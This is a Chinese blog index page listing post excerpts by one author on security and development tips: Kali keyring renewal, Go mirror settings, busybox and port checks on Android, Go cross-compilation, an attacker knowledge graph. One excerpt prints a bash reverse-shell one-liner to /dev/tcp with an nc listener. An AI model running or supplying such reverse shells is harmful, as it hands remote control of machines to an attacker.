上一页 1 2 3 4 5 6 ··· 22 下一页
摘要: https://mp.weixin.qq.com/s/tDJJOfwac5NAick15lS7-A AKG:攻击者知识图谱 原创 404 Not F0und 404 Not F0und 2022-03-12 18:00 图片 知识图谱 知识图谱(Knowledge Graph,KG)由Google于 阅读全文
posted @ 2022-03-31 12:22 micr067 阅读(324) 评论(0) 推荐(0) 编辑
摘要: 安装数字证书 使用apt-key list来查看下,发现有个keyring.gpg 过期了 查看最新的文件 https://http.kali.org/kali/pool/main/k/kali-archive-keyring/ 下载新的文件 wget https://http.kali.org/k 阅读全文
posted @ 2022-03-31 11:36 micr067 阅读(193) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2022-03-24 07:54 micr067 阅读(0) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2022-03-24 07:51 micr067 阅读(0) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2022-03-23 19:52 micr067 阅读(1) 评论(0) 推荐(0) 编辑
摘要: Go 设置国内镜像源 https://goproxy.cn 用法: 打开terminal执行以下语句 go env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 或者更改环境变量 echo "export GO111MOD 阅读全文
posted @ 2022-03-19 17:13 micr067 阅读(2337) 评论(0) 推荐(0) 编辑
摘要: busybox下载: https://busybox.net/downloads/binaries/1.35.0-i686-linux-musl/ busybox使用: ➜ Desktop adb push /Users/xxx/Desktop/busybox1 /sdcard /Users/xxx 阅读全文
posted @ 2022-02-18 12:11 micr067 阅读(246) 评论(0) 推荐(0) 编辑
摘要: 1.查看安卓设备开放的端口 adb shell netstat -a | grep -E 'LISTEN|udp*' 2.将端口号转换为16进制 https://tool.lu/hexconvert/ /proc/net/后面是端口使用的协议,如tcp6 adb shell grep -i f099 阅读全文
posted @ 2022-02-10 18:32 micr067 阅读(2117) 评论(0) 推荐(0) 编辑
摘要: 基础bash反弹shell /bin/bash -i >& /dev/tcp/1.1.1.1/443 0>&1 nc -nvlp 443 Linux下openssl加密反弹shell 在vps上生成 SSL 证书的公钥/私钥对 openssl req -x509 -newkey rsa:2048 - 阅读全文
posted @ 2022-01-27 16:28 micr067 阅读(737) 评论(0) 推荐(1) 编辑
摘要: Golang 支持在一个平台下生成多个平台运行包,编译之后直接可执行,使用起来非常方便。 1.Mac Mac下编译Linux, Windows平台的64位可执行程序: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go CGO_ENABLED 阅读全文
posted @ 2022-01-07 01:39 micr067 阅读(230) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 22 下一页